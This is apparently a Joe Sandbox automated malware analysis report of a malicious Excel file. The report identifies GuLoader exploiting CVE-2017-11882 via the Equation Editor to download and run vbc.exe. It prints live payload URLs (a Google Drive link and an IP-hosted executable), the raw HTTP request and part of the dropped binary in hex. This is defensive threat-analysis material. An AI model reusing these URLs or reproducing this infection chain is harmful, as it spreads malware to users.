Play interactive tour

Edit tour

Windows Analysis Report #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx

Overview

General Information

Sample Name:	#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
Analysis ID:	483661
MD5:	4a1d13469a6c817242e8b567bf34ab9a
SHA1:	a0d54f6c1205defad5f31cadf3393880e7c4c862
SHA256:	65514d1bcd58f206fbc6339c7893a4dc5fb3e7de39177038eac73906ec5c622c
Tags:	LokiVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

GuLoader behavior detected

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2132 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1868 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2228 cmdline: 'C:\Users\Public\vbc.exe' MD5: 451E4CD68C69C2C8B8FC93AD02E8754A)

vbc.exe (PID: 1184 cmdline: 'C:\Users\Public\vbc.exe' MD5: 451E4CD68C69C2C8B8FC93AD02E8754A)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1pn-b6M_RemB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 23.95.85.181, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1868, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1868, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1868, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2228

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1pn-b6M_RemB"}

Multi AV Scanner detection for submitted file

Show sources

Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	Virustotal: Detection: 38%			Perma Link
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	ReversingLabs: Detection: 28%

Antivirus detection for URL or domain

Show sources

Source: http://23.95.85.181/0789/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://23.95.85.181/0789/vbc.exe

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 36%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 20%
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 36%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 20%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 70MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1pn-b6M_RemB

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:06:58 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Wed, 15 Sep 2021 06:03:24 GMTETag: "1e000-5cc0274c3638e"Accept-Ranges: bytesContent-Length: 122880Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8b b7 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 01 00 00 40 00 00 00 00 00 00 ac 17 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 01 00 00 10 00 00 60 75 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 a2 01 00 28 00 00 00 00 d0 01 00 f6 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 97 01 00 00 10 00 00 00 a0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 11 00 00 00 b0 01 00 00 10 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f6 16 00 00 00 d0 01 00 00 20 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /0789/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.85.181Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181

Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: EA784B99.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA784B99.emf

Jump to behavior

Source: global traffic

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Editing from the 16 g yellow bar above ,, This document is 18 3. Once you have enabled edi

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D26BE	6_2_003D26BE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9AB0	6_2_003D9AB0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0EAE	6_2_003D0EAE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D1F	6_2_003D5D1F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0746	6_2_003D0746
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0E3C	6_2_003D0E3C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3C3F	6_2_003D3C3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4835	6_2_003D4835
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9437	6_2_003D9437
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5A2D	6_2_003D5A2D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2E23	6_2_003D2E23
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2C0D	6_2_003D2C0D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C0F	6_2_003D8C0F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D420F	6_2_003D420F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5E07	6_2_003D5E07
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5003	6_2_003D5003
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D847F	6_2_003D847F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D507A	6_2_003D507A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D1077	6_2_003D1077
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C73	6_2_003D8C73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8464	6_2_003D8464
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4266	6_2_003D4266
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9C63	6_2_003D9C63
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3A50	6_2_003D3A50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0844	6_2_003D0844
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0847	6_2_003D0847
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D10BD	6_2_003D10BD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4CB6	6_2_003D4CB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3AB1	6_2_003D3AB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D92B3	6_2_003D92B3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D20A8	6_2_003D20A8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D469F	6_2_003D469F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D149E	6_2_003D149E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D309B	6_2_003D309B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4E8F	6_2_003D4E8F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46F9	6_2_003D46F9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2EFB	6_2_003D2EFB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D48F4	6_2_003D48F4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46DE	6_2_003D46DE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9ADB	6_2_003D9ADB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D62C5	6_2_003D62C5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8EC2	6_2_003D8EC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4B39	6_2_003D4B39
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D493B	6_2_003D493B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9B3B	6_2_003D9B3B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4523	6_2_003D4523
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D491A	6_2_003D491A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4512	6_2_003D4512
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2B0C	6_2_003D2B0C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3F06	6_2_003D3F06
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D1303	6_2_003D1303
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0973	6_2_003D0973
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D73	6_2_003D4D73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D175B	6_2_003D175B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0F57	6_2_003D0F57
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D49BB	6_2_003D49BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D9DB7	6_2_003D9DB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8FB1	6_2_003D8FB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D39AB	6_2_003D39AB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4DAB	6_2_003D4DAB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D59A3	6_2_003D59A3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D879B	6_2_003D879B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D95	6_2_003D4D95
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2F96	6_2_003D2F96
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8D8F	6_2_003D8D8F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D89	6_2_003D4D89
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D81	6_2_003D5D81
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3383	6_2_003D3383
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D7FFF	6_2_003D7FFF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D51F3	6_2_003D51F3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0DDF	6_2_003D0DDF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D85DA	6_2_003D85DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D61CD	6_2_003D61CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D11C7	6_2_003D11C7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2DC7	6_2_003D2DC7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CD5	9_2_001B5CD5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B421B	9_2_001B421B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2E13	9_2_001B2E13
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4208	9_2_001B4208
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5003	9_2_001B5003
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5E07	9_2_001B5E07
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9437	9_2_001B9437
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4835	9_2_001B4835
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5A2D	9_2_001B5A2D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B507A	9_2_001B507A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8C73	9_2_001B8C73
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2E64	9_2_001B2E64
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B469F	9_2_001B469F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9C8B	9_2_001B9C8B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4E8F	9_2_001B4E8F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B92B3	9_2_001B92B3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9AB0	9_2_001B9AB0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4CB6	9_2_001B4CB6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B18AA	9_2_001B18AA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3AA5	9_2_001B3AA5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9ADB	9_2_001B9ADB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8EC2	9_2_001B8EC2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9B3B	9_2_001B9B3B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4B39	9_2_001B4B39
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4933	9_2_001B4933
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D30	9_2_001B5D30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4523	9_2_001B4523
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8F9F	9_2_001B8F9F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4D95	9_2_001B4D95
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8D8F	9_2_001B8D8F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D81	9_2_001B5D81
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8FB1	9_2_001B8FB1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9DB7	9_2_001B9DB7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4DAB	9_2_001B4DAB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BAC	9_2_001B8BAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B59A3	9_2_001B59A3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3DA1	9_2_001B3DA1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7DA0	9_2_001B7DA0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7FFF	9_2_001B7FFF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BFF	9_2_001B8BFF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B49EB	9_2_001B49EB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D26BE NtWriteVirtualMemory,	6_2_003D26BE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0EAE CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,	6_2_003D0EAE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D1F NtWriteVirtualMemory,NtAllocateVirtualMemory,	6_2_003D5D1F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D958B NtProtectVirtualMemory,	6_2_003D958B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4835 NtWriteVirtualMemory,	6_2_003D4835
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D960D NtProtectVirtualMemory,	6_2_003D960D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C0F NtWriteVirtualMemory,	6_2_003D8C0F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5E07 NtAllocateVirtualMemory,	6_2_003D5E07
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5003 NtWriteVirtualMemory,	6_2_003D5003
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D507A NtWriteVirtualMemory,	6_2_003D507A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4266 NtWriteVirtualMemory,	6_2_003D4266
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4CB6 NtWriteVirtualMemory,	6_2_003D4CB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D469F NtWriteVirtualMemory,	6_2_003D469F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4E8F NtWriteVirtualMemory,	6_2_003D4E8F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46F9 NtWriteVirtualMemory,	6_2_003D46F9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D48F4 NtWriteVirtualMemory,	6_2_003D48F4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46DE NtWriteVirtualMemory,	6_2_003D46DE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4B39 NtWriteVirtualMemory,	6_2_003D4B39
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D493B NtWriteVirtualMemory,	6_2_003D493B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4523 NtWriteVirtualMemory,	6_2_003D4523
